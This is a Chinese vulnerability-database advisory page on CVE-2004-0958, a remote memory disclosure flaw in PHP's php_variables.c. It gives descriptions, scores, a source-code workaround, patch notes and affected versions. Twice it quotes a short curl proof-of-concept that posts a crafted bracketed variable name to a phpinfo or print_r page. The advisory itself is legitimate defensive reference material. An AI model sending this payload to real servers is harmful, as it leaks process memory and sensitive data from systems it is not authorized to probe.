CVE-2004-0958
CVSS5.0
发布时间 :2004-11-03 00:00:00
修订时间 :2016-10-17 22:50:10
NMCOES    

[原文]php_variables.c in PHP before 5.0.2 allows remote attackers to read sensitive memory contents via (1) GET, (2) POST, or (3) COOKIE GPC variables that end in an open bracket character, which causes PHP to calculate an incorrect string length.


[CNNVD]PHP PHP_Variables远程内存泄露漏洞(CNNVD-200411-030)

        
        PHP是一种流行的WEB服务器端编程语言。
        PHP中由于php_variables.c的错误数组解析,远程攻击者可以利用这个漏洞获得PHP代码或者部分内存数据。
        通过在追加一个GET/POST/COOKIE变量数组后追加一个'[',如abc[a][,'a'数组元素长度设置为变量名strlen("abc")长度变量,可导致服务程序返回部分内存信息给攻击者,可能导致敏感信息泄露。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10863php_variables.c in PHP before 5.0.2 allows remote attackers to read sensitive memory contents via (1) GET, (2) POST, or (3) COOKIE GPC varia...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0958
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0958
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-030
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0053.html
(UNKNOWN)  VULNWATCH  20040915 [VulnWatch] PHP Vulnerability N. 1
http://marc.info/?l=bugtraq&m=109527531130492&w=2
(UNKNOWN)  BUGTRAQ  20040915 PHP Vulnerability N. 1
http://securitytracker.com/id?1011279
(UNKNOWN)  SECTRACK  1011279
http://www.redhat.com/support/errata/RHSA-2004-687.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:687
http://xforce.iss.net/xforce/xfdb/17393
(VENDOR_ADVISORY)  XF  php-phpinfo-disclose-memory(17393)
https://bugzilla.fedora.us/show_bug.cgi?id=2344
(UNKNOWN)  FEDORA  FLSA:2344

- 漏洞信息

PHP PHP_Variables远程内存泄露漏洞
中危 其他
2004-11-03 00:00:00 2005-10-20 00:00:00
远程  
        
        PHP是一种流行的WEB服务器端编程语言。
        PHP中由于php_variables.c的错误数组解析,远程攻击者可以利用这个漏洞获得PHP代码或者部分内存数据。
        通过在追加一个GET/POST/COOKIE变量数组后追加一个'[',如abc[a][,'a'数组元素长度设置为变量名strlen("abc")长度变量,可导致服务程序返回部分内存信息给攻击者,可能导致敏感信息泄露。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在php5.0.1中修改main/php_variables.c的136行:
        index_len = var_len = strlen(var);
        改为
        index_len = var_len = strlen(index);
        并重新编译。
        厂商补丁:
        PHP
        ---
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        PHP Upgrade PHP 5.0.2
        
        http://www.php.net/downloads.php#v5

- 漏洞信息 (24656)

PHP 4.x/5.0.1 PHP_Variables Remote Memory Disclosure Vulnerability (EDBID:24656)
php remote
2004-09-15 Verified
0 Stefano Di Paola
N/A [点击下载]
source: http://www.securityfocus.com/bid/11334/info

A vulnerability is reported to present itself in the array parsing functions of the 'php_variables.c' PHP source file. 

The vulnerability occurs when a PHP script is being used to print URI parameters or data, that are supplied by a third party, into a dynamically generated web page. It is reported that the vulnerable function does not strip certain characters from the user supplied data, this may ultimately be harnessed to manipulate the parsing function into returning regions of process memory to the attacker.

It is reported that this issue only affects PHP versions 4.2.0 and subsequent.

$ curl "http://www.example.com/phpinfo.php" -d `perl -e 'print
"f"x100;print "[g][=1"'`

where phpinfo.php is:
<?
phpinfo();
?>

or some php file containing print_r function:
<?
print_r($_REQUEST);
?>		

- 漏洞信息

12601
PHP php_variables.c Multiple Variable Open Bracket Memory Disclosure
Information Disclosure
Loss of Confidentiality Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2004-09-15 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 5.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

PHP PHP_Variables Remote Memory Disclosure Vulnerability
Failure to Handle Exceptional Conditions 11334
Yes No
2004-09-15 12:00:00 2009-07-12 07:06:00
Discovery of this issue is credited to Stefano Di Paola <stefano.dipaola@wisec.it>.

- 受影响的程序版本

SGI ProPack 3.0
RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
Red Hat Fedora Core1
PHP PHP 5.0.1
PHP PHP 5.0 .0
PHP PHP 4.3.8
+ Mandriva Linux Mandrake 10.1 x86_64
+ Mandriva Linux Mandrake 10.1
+ S.u.S.E. Linux Personal 9.2
+ Turbolinux Turbolinux Server 10.0
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
PHP PHP 4.3.7
PHP PHP 4.3.6
PHP PHP 4.3.5
PHP PHP 4.3.4
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ S.u.S.E. Linux Personal 9.1
PHP PHP 4.3.3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
PHP PHP 4.3.2
PHP PHP 4.3.1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ OpenPKG OpenPKG Current
+ S.u.S.E. Linux Personal 8.2
PHP PHP 4.3
PHP PHP 4.2.3
+ EnGarde Secure Linux 1.0.1
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
PHP PHP 4.2.2
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
PHP PHP 4.2.1
- FreeBSD FreeBSD 4.6
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3
+ Slackware Linux 8.1
PHP PHP 4.2 .0
PHP PHP 4.1.2
+ Apple Mac OS X 10.1.5
+ Apple Mac OS X 10.1.4
+ Apple Mac OS X 10.1.3
+ Apple Mac OS X 10.1.2
+ Apple Mac OS X 10.1.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.0.4
+ Apple Mac OS X 10.0.3
+ Apple Mac OS X 10.0.2
+ Apple Mac OS X 10.0.1
+ Apple Mac OS X 10.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ MandrakeSoft Multi Network Firewall 2.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
PHP PHP 4.1.1
+ Conectiva Linux 7.0
PHP PHP 4.1 .0
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
PHP PHP 4.0.7
PHP PHP 4.0.6
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ HP Secure OS software for Linux 1.0
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- IBM AIX 5.1
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ Sun Cobalt RaQ 550
+ Sun LX50
+ Trustix Secure Linux 1.5
PHP PHP 4.0.5
PHP PHP 4.0.4
+ Compaq Compaq Secure Web Server PHP 1.0
+ Conectiva Linux 6.0
+ Guardian Digital Engarde Secure Linux 1.0.1
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
PHP PHP 4.0.3
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Sun Cobalt Control Station 4100CS
+ Sun Cobalt Qube3 Japanese 4000WGJ
+ Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ
+ Sun Cobalt Qube3 Japanese w/Caching 4010WGJ
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ XTR Japanese 3500R-ja
PHP PHP 4.0.2
PHP PHP 4.0.1
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt Qube3 w/ Caching and RAID 4100WG
+ Sun Cobalt Qube3 w/Caching 4010WG
+ Sun Cobalt RaQ4 3001R
+ Sun Cobalt RaQ4 Japanese RAID 3100R-ja
+ Sun Cobalt RaQ4 RAID 3100R
PHP PHP 4.0 0
Gentoo Linux 1.4 _rc3
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
Gentoo Linux 1.4
Gentoo Linux 1.2
Gentoo Linux 1.1 a
Gentoo Linux 0.7
Gentoo Linux 0.5
PHP PHP 5.0.2

- 不受影响的程序版本

PHP PHP 5.0.2

- 漏洞讨论

A vulnerability is reported to present itself in the array parsing functions of the 'php_variables.c' PHP source file.

The vulnerability occurs when a PHP script is being used to print URI parameters or data, that are supplied by a third party, into a dynamically generated web page. It is reported that the vulnerable function does not strip certain characters from the user supplied data, this may ultimately be harnessed to manipulate the parsing function into returning regions of process memory to the attacker.

It is reported that this issue only affects PHP versions 4.2.0 and subsequent.

- 漏洞利用

The following example is available:

$ curl "http://www.example.com/phpinfo.php" -d `perl -e 'print
"f"x100;print "[g][=1"'`

where phpinfo.php is:
&lt;?
phpinfo();
?&gt;

or some php file containing print_r function:
&lt;?
print_r($_REQUEST);
?&gt;

- 解决方案

The vendor has released an upgrade dealing with this issue.

Gentoo Linux has released an advisory (GLSA 200410-04) and an updated eBuild to address this vulnerability. Gentoo users are advised to run the following commands to apply the updates:
emerge sync

emerge -pv ">=dev-php/php-4.3.9"
emerge ">=dev-php/php-4.3.9"

emerge -pv ">=dev-php/mod_php-4.3.9"
emerge ">=dev-php/mod_php-4.3.9"

emerge -pv ">=dev-php/php-cgi-4.3.9"
emerge ">=dev-php/php-cgi-4.3.9"

Red Hat has released Red Hat Enterprise Linux advisory RHSA-2004:687-05 to address various issues in PHP. Please see the advisory in Web references for more information.

Fedora has released advisories FEDORA-2004-567 and FEDORA-2004-568 to address various PHP issues in Fedora Core 2 and Fedora Core 3. Please see the referenced advisories for more information.

SGI has released advisory 20050101-01-U to address various issues in SGI Advanced Linux Environment 3. This advisory includes updated SGI ProPack 3 Service Pack 3 packages. Please see the referenced advisory for more information.

Fedora has released Fedora Legacy advisory FLSA:2344 to address various issues in Red Hat Linux 7.3, Red Hat Linux 9.0 and Fedora Core 1 for the i386 architecture. Please see the referenced advisory for more information.


SGI ProPack 3.0

PHP PHP 4.0 0

PHP PHP 4.0.1

PHP PHP 4.0.2

PHP PHP 4.0.3

PHP PHP 4.0.4

PHP PHP 4.0.5

PHP PHP 4.0.6

PHP PHP 4.0.7

PHP PHP 4.1 .0

PHP PHP 4.1.1

PHP PHP 4.1.2

PHP PHP 4.2 .0

PHP PHP 4.2.1

PHP PHP 4.2.2

PHP PHP 4.2.3

PHP PHP 4.3

PHP PHP 4.3.1

PHP PHP 4.3.2

PHP PHP 4.3.3

PHP PHP 4.3.4

PHP PHP 4.3.5

PHP PHP 4.3.6

PHP PHP 4.3.7

PHP PHP 4.3.8

PHP PHP 5.0 .0

PHP PHP 5.0.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站